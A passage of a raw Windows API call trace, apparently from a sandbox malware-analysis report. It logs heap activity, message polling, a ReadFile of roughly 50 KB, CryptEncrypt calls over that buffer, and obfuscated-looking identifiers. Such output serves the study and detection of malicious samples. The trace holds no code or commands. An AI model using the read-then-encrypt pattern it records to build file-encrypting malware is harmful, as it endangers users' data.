lpMsg=0x8bf710) returned 0 [0162.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0162.148] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0162.148] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0162.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0162.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0162.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0162.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0162.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0162.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0162.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0162.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0162.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0162.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0162.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0162.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0162.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0162.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0162.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36a0020 [0162.150] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0162.150] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xc6da, lpOverlapped=0x0) returned 1 [0162.663] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0162.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0162.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0162.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0162.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc6da) returned 0x24d7a58 [0162.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36a0020 | out: hHeap=0x25c0000) returned 1 [0162.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0162.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0162.665] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0162.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0162.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0162.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc6da) returned 0x24d7a58 [0162.665] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0162.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0162.667] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0162.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0162.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0162.667] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0162.668] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0162.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0162.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0162.669] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0162.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0162.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0162.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.669] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0162.669] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0162.670] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0162.670] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.670] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0162.670] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0162.670] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0162.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0162.671] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0162.671] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.671] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0162.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0162.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0162.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0162.671] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.671] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0162.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0162.671] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0162.671] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0162.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0162.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0162.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0162.671] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0162.672] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.672] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.672] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.672] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.672] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.672] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.672] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.672] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.672] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.672] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.672] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.672] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.672] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.673] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.673] CryptEncrypt (in: hKey=0xaa55e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xc6da, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xc6e0) returned 1 [0162.673] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.673] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.673] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.673] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.673] CharLowerBuffW (in: lpsz="byte[50912]", cchLength=0xb | out: lpsz="byte[50912]") returned 0xb [0162.673] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.675] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.675] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.675] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.676] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.676] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0162.676] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.676] CryptEncrypt (in: hKey=0xaa55e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34be938*, pdwDataLen=0x8bef68*=0xc6da, dwBufLen=0xc6e0 | out: pbData=0x34be938*, pdwDataLen=0x8bef68*=0xc6e0) returned 1 [0162.677] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.677] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.677] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.677] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.678] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.678] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.678] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.678] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0162.678] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.678] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0162.678] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.678] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.678] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0162.678] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.678] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0162.678] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.679] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.679] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0162.679] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.679] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0162.679] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.679] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0162.679] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.679] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0162.679] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.679] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0162.679] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.684] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.684] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.684] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.687] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.687] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.687] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0162.688] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0162.688] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0162.688] 